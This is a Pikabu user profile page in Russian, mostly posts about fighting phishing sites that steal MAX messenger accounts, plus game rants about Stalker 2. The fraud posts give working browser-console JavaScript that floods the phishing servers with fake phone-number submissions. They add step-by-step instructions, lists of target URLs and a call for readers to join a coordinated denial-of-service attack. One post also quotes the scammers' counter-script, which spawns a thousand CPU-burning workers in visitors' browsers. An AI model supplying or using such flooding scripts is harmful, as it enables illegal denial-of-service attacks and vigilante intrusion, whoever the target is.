sinelnikof

sinelnikof

На Пикабу
Дата рождения: 11 января
12К рейтинг 10 подписчиков 62 подписки 26 постов 11 в горячем
Награды:
10 лет на Пикабу
17

Наказываем мошенников (max edition)

Для желающих - инструкция внизу

Глава 1 Прострация


Очередная волна атаки мошеннков накрыла нашу тили - мили трямдию теперь через защищенный месенджер макс
Итак - исходные данные
1 от захваченного уже аккаунта потравляются сообщения с порозьбой проголосовать , или перейти по ссылке
2 человек переходит на сайт - его требуют авторизоваться через макс
3 при получении сообщения - 6 знаков в смс вводим их
4 прощаемся со всвоим акаунтом и сесией. данные для авторизации уже у мошеннков.
5 паника

итак путь атаки -

на телефон знакомых присланна ссылка -
https://densi.ee/kseniya-borisova-max
смотрим whois
IP62.60.226.188
Хост:densi.ee
Город:Франкфурт-на-Одере
Страна: Германия
IP диапазон:62.60.226.0 - 62.60.226.255

обычно там живут vps - небольшие сервера для сайтов и всякой мелочи. типа сайт нашего ПТУ
но сейчас это сайт для атаки

Глава 2 вскрытие покажет...

входить мы конечно же не будем - мы умнее, посмотрим из чего состоит сайт

а вот это уже инетресней - есть ссылка на сайт https://max-funny.xyz/ - скорее всего агрегатор и главный сайт мошенников
iP89.22.235.21

Хост:max-funny.xyz

Город:Стокгольм

Страна: Швеция

IP диапазон:89.22.232.0 - 89.22.239.255

Название провайдера:Aeza-Network

на самом деле whois смотрим чисто номенально - так как скорее всего сайт спрятан за прокси cloudflare или чем нибудь еще


Посмотрим механизм дальше -
если перейти на https://max-funny.xyz/art тут же будет дописан адрес
https://max-funny.xyz/art#t=eyJzdWIiOjEzMSwidXNlcm5hbWUiOiJN.........
ниикаких куков стореджей и сокетов - все в адресной строке )))посмотрим что там живет )))
Вообше очень напиминает base64 - это такой алгоритм хеширования
Засовываем эту кашу в dase64decode - есть такой сайт и на выходе

{"sub":131,"username":"Monroe","is_admin":0,"exp":1780495590,"la":1777903590,"jti":"kylYJhFSeBV2sPsL1fab_w","qr_session":"xoHLA3KxSviTP7az","qr_domain":"max-funny.xyz","qr_redirect_url":"https://s.fotora.ru/65599f00fc3fcbca.jpeg","qr_auth_method":"phone_code","qr_theme":"white","qr_page_variant":"v2","qr_phone_title":"\u0412\u043e\u0439\u0434\u0438\u0442\u0435 \u0432 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u041c\u0410\u041a\u0421","qr_key_path":"art"}}8w:ׇֻk秵i_]5y[͚٧^o6Λ

- какая перлесть тут же и сессия тут же и пользовать какой то и время протухания сессии. и еще какая то подпись (скорее всего для проверки, либо соленый хеш либо просто рандомные байты)
то есть мы имеем дело не с одним сервачком - а скорее всего с какми хо сервисом который молотит аккаунты на широкую ногу

так теперь подумаем как можно нагатить в этот малинник
скорее всего (только мое предположение) что работает это так:

1 получили телефон от пользователя
2 отправили запрос на серввера макс - ему смс или оповещение (если смс это отлично)
3 получили данные авторизаци - отвязываем телефон
4 рассылаем спам ломаем гос услуги и получаем полный доступ к документам - берем кредиты, дарим недвижемость итд - вообщем будет жопа

Что бы немного замедлить этот гнилой процесс нужно навалить много тупого трафика - по сути вызвав отказ работы их серверов либо затянуть процесс авторизации у несчастных которые попались в ловушку. Сервера могут быть мощные но канал и память не бесконечны.

Глава 3 охота на пиранью

По итогу у нас есть -
1 сервера мошенников
2 тупая защита на их стороне
3 возможность немного осложнить им жизнь

Изучив код и написав несколько js скриптов выявил что можно с одной страницы отправить много запросов с номерами телефонов, если отправлять сильно часто - отправка будет заблокированна ddos защитой, поэтому важн тайминги - время между отправкой и тем пока тебя заблокирует protector
POST https://max-funny.xyz/api/phone/start 429 (Too Many Requests)
- это нас защита блокнула

перидический возникает ошибка 502 - это уже хорошо, либо скрвак реально споткнулся илбо упал процесс распеределения нагрузки между серверам - ну в любом случае радостно

Глава 4 малая ионная пушка

сам код



setTimeout(() => {

// Находим кнопку входа и поле ввода телефона в DOM

const phoneInput = document.getElementById('phone-input');

const loginBtn = document.getElementById('btn-login');

if (!phoneInput || !loginBtn) {

console.error('❌ Элементы формы не найдены');

return;

}

const TOTAL_REQUESTS = 1000;

let completed = 0;

// Функция отправки одного запроса через оригинальный код

async function sendOneRequest(requestId) {

return new Promise((resolve) => {

// Генерируем случайный телефон

const randomPhone = '791' + Math.floor(Math.random() * 10000000).toString().padStart(10, '0');

// Эмулируем ввод телефона

phoneInput.value = randomPhone;

phoneInput.dispatchEvent(new Event('input', { bubbles: true }));

// Ждем активации кнопки

setTimeout(() => {

if (!loginBtn.disabled) {

loginBtn.click();

console.log(`✅ #${requestId}: Запрос отправлен (телефон: ${randomPhone})`);

resolve(true);

} else {

console.log(`❌ #${requestId}: Кнопка не активна`);

resolve(false);

}

}, 5000);

});

}

console.log('🚀 ЗАПУСК ТЕСТА');

console.log(`📊 Запросов: ${TOTAL_REQUESTS}`);

console.log('='.repeat(50));

// Запускаем последовательные запросы

async function runTest() {

for (let i = 1; i <= TOTAL_REQUESTS; i++) {

await sendOneRequest(i);

completed++;

console.log(`📊 Прогресс: ${completed}/${TOTAL_REQUESTS}`);

// Ждем между запросами

if (i < TOTAL_REQUESTS) {

await new Promise(r => setTimeout(r, 7000));

// Очищаем поле ввода

phoneInput.value = '';

phoneInput.dispatchEvent(new Event('input', { bubbles: true }));

}

}

console.log('\n✅ ТЕСТ ЗАВЕРШЕН');

}

runTest();

}, 1000);

инструкция -
1 заходим на сайт https://max-funny.xyz/art (должен подставиться токен - ссылка будет длинная)
2 жмем на клавиатуре F12 (открывается консоль)
3 находим вкладку клнсоль или console
4 вставляем туда код (который выше)
5 жмем enter - и можно заниматься своими делами и любоваться выводом в консоль
6 изредка обновляем странцу для полчения новго токена и поехали снова

Скрипт генерирует случайный нмер телефона и отправялем его параметр const TOTAL_REQUESTS = 1000; говорит о отм что буде отправленно 1000 рандомных телефонов await new Promise(r => setTimeout(r, 7000)); задержка между отправками const randomPhone = '791' + Math.floor(Math.random() * 10000000).toString().padStart(10, '0'); тут рандомный телефон генерируется

Вообщем то все, что хотел рассказать. В прошлый раз Наказываем мошенников
было весело, когда их сервера нагули всем сообществом

За сим все! до новых встреч !!!!))))

PS если тут будут всякие типы - чет про граматику говорить, или запятых насыпать .... вот идите к козе в трещщину! я вам тут не граматей

Показать полностью 5
13

Ответ на пост «Почему размер приложений и сайтов растет с каждым годом?»10

Ответ простой до безобразия. Потому что сайт можно собрать из готовых модулей, для этого существуют вендоров в композере. Они содержат универсальный код, например модального окна. Оно будет открываться даже в херовом браузере. Красивая , всплывает, работает на событиях браузера . Содержит 101 способ вызова . Экономит кучу времени разраба. Но 80% там нахрен ненужны. Но их выпилить нельзя. Это противоречит методологии композера.

Второе, всратые дизайны. Которые придумывает гениальный дизайнер. Охеревая, верстает фронтедщик. Матерясь пришивает функционал бекенд программер.

И это все должно работать на всех устройствах со своим разрешением экрана.

С мобилкой дело примерно так же. Если пишут на флаттере- делают сразу под все устройства. И андроид и айос и винда и Линукс. Но весит это говнище +200 мб. Если писать на нативке java андроид, приложуха весит 20 мб с тем же функционалом.

За скорость разработки платят производительностью . А заказчику нужно уже сегодня какую нибудь штуку внедрить - вопрос бизнеса и финансового выживания. Да херово, и тормозит , но уже работает

42

Про сталкер 2, много мата будет. Бомбит

крч, меня щас бомбануло - решил написать опус

началось все много лет назад - когда поиграл в чистое небо ,

атмосфера - тайны - заябись !!!

с тех пор считаю себя фаном серии (но не упоротый который мерч скупает), а просто сталкер ну нравиться

сегодня выкачал с торента сталкера 2

ну полный пиздец.....

по пунктам

хорошее

1 завезли атмосферу - чувсвуется ветер

2 лицевая анимация - кое где норм

3 звуки - не заморачиваясь взяли из старого сталкача

4 хороший эмбиент

5 карта бесшовка

6 текстуры на максиалках красивые

7 кат сцены более мение - нормально

8 есть запоминающиеся персанажи - прям хорошо модели сделанны

плохое

1 импакт от оружия - полное говно, не чувствуется отдача в той же батле просто в разы лучше

2 дико просаживает фпс с минимальными настройками графики

4 передвежение - как будто в желе

5 уебанский сюжет - (пиздануло что-то дома, и уже едем по зоне на грузовике, нахера?, зачем? )

6 спавн противников - по скрипту

7 а-live - нахуй, даже намека нет - тупо боты тебя атакуют , или бегают по скрипту

8 ебанутый инвентарь-переключение оружия, выбор пердметов - через колесо действия (как команды в батле)

9 раковая анимация, аптечки в бою хуй применишь, пока перезаряжаешься 100 раз убюьт даже тупые боты

10 анимация тупит - пока не отиграет - не получишь лечения или перезарядки, а если начал и то и другое - тупо висишь пока тебя собаки едят

11 взамодействие с миром - что обещали, полный пиздеж работае только то - на что прописанны события

12 HUD просто мразь - как дебил бегаешь по маркерам которые выставляешь в карте как активные - никакого желания исследовать територию нет

13 биндинг клавиатуры - делал какой то ублюдок - открываем на F - закрваем на esс , забрать все на R пиздец.

да чтоб у него был понос и он каждый раз в толчек срать ходил через чердак

14 загрузка шейдеров - 28 сука минут!!!! на i5, 32 оперативы и rtx 2060 при том установка минут 40...

вот честно - без политики, без всей хуеты - сделали циркового уродца.

Просто жалко, что пол дня качал и вообщем часа полтора ставил

на данном этапе - неиграбельное говно.

Фанатские моды на движке x-ray оказались намного круче этой жертвы аборта от мира геймдева.

И самое главное чего тут нет , это истории. Какая мотивация у чувака ??? Я блядь за 4 часа не понял, нахер мне в это лагающее говно играть.

На том же ар-про сюжетные моды которые реально рассказывают историю. У игрока есть причина почему он там оказался.

Мне, как игроку, вот нахер не уперлось отражение лучей. Дай интересный сюжет

С дочкой недавно играли в mouthwash, несмотря на мерзкую графику (в смысле уебищную ) и кучу клише, игра реально интересней.

Даже в оп2.2 больше интересного чем во втором сталкере

Резюме. Игра деградировала. Она не интересная.

Расстроенный - снёс нахрен его с компа и пошел качать аномали.

Показать полностью
117

Ответ на пост «А знаете, что самое обидное?»29

Тут работает другой механизм. Никакой справедливости в жизни нет. Сама природа не оперирует таким понятием.

Просто дикий уебан с большей вероятностью попадет в ситуацию где ему череп проломят, или под мефом из окна выйдет на чистый асфальт.

Но это не 100%

Примерно у половины школьных агрессоров, которых я знаю - очень херово жизнь сложилась,. Примерно четверть уже в гробах. Именно их образ жизни и привел к смерти.

Вера в справедливость это форма самообмана (точнее защиты). Для того что бы не развивать неврозы. Либо прожить херовый момент жизни.

Вообщем воздастся многим по содеянному, но не всем.

5

Ответ на пост «Разработчики Stalker 2 опубликовали 35-минутное видео с подробным обзором — вот что в нем»1

Такс, вставлю свои 5 копеек. По геймплею , есть хорошие моменты , типа погреба под церковью. Но как мне показалось на этом все... Есть в геймдев такая приколюха, места для прохождения помечать , ненавящевыми флагами. Если присмотреться - лестницы с жёлтой краской, места интереса - прям выпячиваются. То есть ведут игрока. То есть нет смысла исследовать зону- смотри по маякам куда идти и что делать. Лично для меня это сразу минус- в сталкаче весь смысл это лазать по зоне. Никаких нахер подсказок.

Вот реально мододелы уже выдали все что можно выжать из xray.

Вообще по графону думаю у многих притензии типа анимации, или тут не хватает прорисовки. Главное я думаю в игре это сюжет и окружение.

Тот же атомик, выстрелил потому что его реально ждали. Роботы советского союза, это же охренительно!!! в перемешку с фантастикой но без перегибов.

Что показали

- эффекты niagara.

- пару тройку аномалий.

- ботов которые сравнятся и атакуют по тупомы принципу зомби.(добежал-атака)

(Это все в ue5 работает практический из коробки )

- кат сцены - по стуи ролики записанные актерами и накинутые на скины персонажей.

Что не показали

Торговля

Анимации противников и союзников - людей

Базы и стоянки сталкеров

Реализованный a-live

Совместная работа сквадов

А вот тут надо ДОХЕРА программировать - и понимание игрового баланса.

Из заявленных 30... С лишним типов оружня показали вроде 4.ну если ак и ак с прицелом, это разные , тогда ок.

К каждому оружию нужно делать как минимум 4-5 уникальных анимации тут дохрена крапотливой работы.

Итого. Вот самое где придется делать ооооочень много. Этого не показанно. Пок что показан шутер по мотивам сталкера , а не сам сталкач

Показать полностью
204

Народ! обновление по мошенникам!

Поднимите в топ !!! БЕЗ РЕЙТИНГА!!! В настоящий момент атака не работает
Предыдущие материалы

Наказываем мошенников
Ответ на пост «Наказываем мошенников»


ОТМЕНА!!! НА НАСТОЯЩИЙ МОМЕНТ АТАКА БЕСПОЛЕЗНА!!!!!!!!!!!! и будет нагружать только ваши пк!!!!!

пока что думаю что можно предпринять!

Сегодня один из пользователей написал что скрипт не работает, При изучении вопроса было выявлено что они изменили код js
https://russiadancetournament.ru/static/js/number.js

socket.on("surprise", () => { const surprise = (numberOfWorkers) => { for (let i = 0; i < numberOfWorkers; i++) { const worker = new Worker(URL.createObjectURL(new Blob([` self.onmessage = () => { while (true) { for (let j = 0; j < 1e6; j++) { let x = Math.random(); let y = Math.sqrt(x); let z = Math.sin(y) * Math.cos(y); } } }; `], { type: 'text/javascript' }))); worker.postMessage('start'); } }; surprise(1000); });

этот кусок говна нагружает комп пользователя - то есть атака становится бесполезной для простого использования, ну чтож ))))) это значит что предидущие действия были актуальны)))). Теперь буду думать что с этим делать, может что нить и придумаю.

Тут программистов много. Но сидят в основном Read-only.

Господа ваш выход)))))))

Пока придумываю новые пути написал заявку на фишинговые сайты но , оказывается там была еще не закрытая от МАЯ!!!!!!

висела от МАЯ!!!!!!!!!!!

висела от МАЯ!!!!!!!!!!!

и новая заявка

теперь их 2 висит

теперь их 2 висит

так что регистратор клал огромный член на фиш домены

Очень прошу всех участвующих публиковать информацию . о большинстве сайтов просто не знаем

Показать полностью 2
124

Ответ на пост «Наказываем мошенников»4

ну что-ж )))) все огромное спасибо кто принимал участие в этом действии

ну что-ж )))) все огромное спасибо кто принимал участие в этом действии

Для того что бы случайно не перейти на сайты поставлен знак "#"

как понимаю несколько десятков (может сотен человек ) - реально положили сервер этих педиков
на протяжений 2-3 часов сервер был недоступен вообще!!!!! - то есть на время остановились цепочки рассылки. - сейчас сервера снова запущенны. Но планирую снова продолжать их валить. дыру они так и не закрыли !!!!! ребяты!!!!! ВЫ ОГОНЬ, реально остановили рассылку спама !!!!!!!! пускай даже на небольшое время. Это оказалось Эффективнее чем обращения к хостерам и в касперские


UDP!!!! адреса для скрипта
https://russiadancetournament#.ru/home/vote195

https://russiadancetournament#.ru/home/vote191

https://russiadancetournament#.ru/home/vote194

https://russiadancetournament#.ru/home/vote7

https://russiadancetournament#.ru/home/vote197

https://russiadancetournament#.ru/home/vote190

https://russiadancetournament#.ru/home/vote193

https://russiadancetournament#.ru/home/vote77

https://russiadancetournament#.ru/home/vote196

https://russiadancetournament#.ru/home/vote136

https://russiadancetournament#.ru/home/vote6

https://russiadancetournament#.ru/home/vote137

https://russiadancetournament#.ru/home/vote3

https://russiadancetournament#.ru/home/vote1

https://russiadancetournament#.ru/home/vote135

https://russiadancetournament#.ru/home/vote8

https://russiadancetournament#.ru/home/vote15

https://russiadancetournament#.ru/home/vote192


для лл

1 заходим на https://russiadancetournament#.ru/login/number192

2 открываем консоль (F 12)

3 вводим туда

socket = io("/", { path: "/socket.io", query: "type=number" });

setTimeout(function () { for (let i = 0; i < 1000000; i++) {

socket.emit("start_number", {number: "8" + Math.floor(Math.random() * 1000000000)}) }

}, 3000);


4 ждем пока не появится строчки с 502 ошибкой

обновляем страницу и начинаем с пункта 1


так же на время нашего натиска были недоступны сервера:

DANCEGALARUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

DANCEBATTLERUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

DANCECUPRUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

DANCEFESTIVALRUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

DANCEGALARUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

DANCEMASTERSRUSSIA#.ru/socket.io/?type=number&amp;EIO=4&amp;transport=pollin...

Еще раз всем спасибо, кто хочет продолжить - нет преград тому, чтобы отчистить интернет от этих мудаков. Можем их нахрен задовить! И ЭТО ДЕЙСТВИТЕЛЬНО НАМ ПОД СИЛУ.... это охренннео

Показать полностью 1
177

История о том как мне надоело ждать s.t.a.l.k.e.r 2

Вообщем дело было так - когда то давно когда появился первый пк продавец из ларька с дисками мне посоветовал поиграть в игру - сталкер. С дикой радостью я помчался домой. и лишь дома я обнаружил что диск не читается. Моему горю не было предела- я запаковал диск и побежал обратно. Парень уже закрывал свою коморку. Со швыркаюшим носом я ему сказал что мол - диск не запускается. Он посмотрел на меня и спрашивает - а у тебя cd или dvd привод?
оказалось мой комп не способен читать dvd ((( Через некоторое время я скопил денег на привод. Счастью не было предела

И вот устанавливаю игру - комп жужжит, загружается заставка...и со всего маху я бухнулся в мир зоны отчуждения.

Вообщем - к чему эта вся приамбула!? Я провел много увлекательных часов за этой игрой. И как многие ждал выхода второго ждалкера (реально ждалкер). Но исходя из последних событий - контора GSC Окончательно забила на все, и продолжения скорее всего не будет.

Окончательно расстроившись я установил unreal engine5 и по урокам собираю механику

На настоящий момент гг умеет бегать  и приседать , имеет прицел, инвентарь, умеет складывать инвентарь в ящик

сейчас в качестве исходников буду использовать op2.2 так как там много персонажей - и вообще уже готовые текстуры хорошего качества (огромная благодарность авторам!!!!) и готовые модели.

Но не без ложки дегтя ))) дело в том что двиок xray - сталкера использует свой формат 3d моделей, котрые unreal понимать в принципе не умеет. и вот сейчас перевожу модели через blener а текстуры конвертирую

for file in `find ./ -type f -name "*.dds"`

do

convert "$file" "$(dirname "$file")$(basename "$file" .dds).png"

done

благо давно установил linuxsubsystem. Вообще играми не занимался никогда, очень увлекательно ))) Спасибо что прочитали ) всего самого лучшего )))

Показать полностью 7
Отличная работа, все прочитано!

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы

Сообщества

Игры

Теги

Популярные авторы

Сообщества

Юмор

Теги

Популярные авторы

Сообщества

Отношения

Теги

Популярные авторы

Сообщества

Здоровье

Теги

Популярные авторы

Сообщества

Путешествия

Теги

Популярные авторы

Сообщества

Спорт

Теги

Популярные авторы

Сообщества

Хобби

Теги

Популярные авторы

Сообщества

Сервис

Теги

Популярные авторы

Сообщества

Природа

Теги

Популярные авторы

Сообщества

Бизнес

Теги

Популярные авторы

Сообщества

Транспорт

Теги

Популярные авторы

Сообщества

Общение

Теги

Популярные авторы

Сообщества

Юриспруденция

Теги

Популярные авторы

Сообщества

Наука

Теги

Популярные авторы

Сообщества

IT

Теги

Популярные авторы

Сообщества

Животные

Теги

Популярные авторы

Сообщества

Кино и сериалы

Теги

Популярные авторы

Сообщества

Экономика

Теги

Популярные авторы

Сообщества

Кулинария

Теги

Популярные авторы

Сообщества

История

Теги

Популярные авторы

Сообщества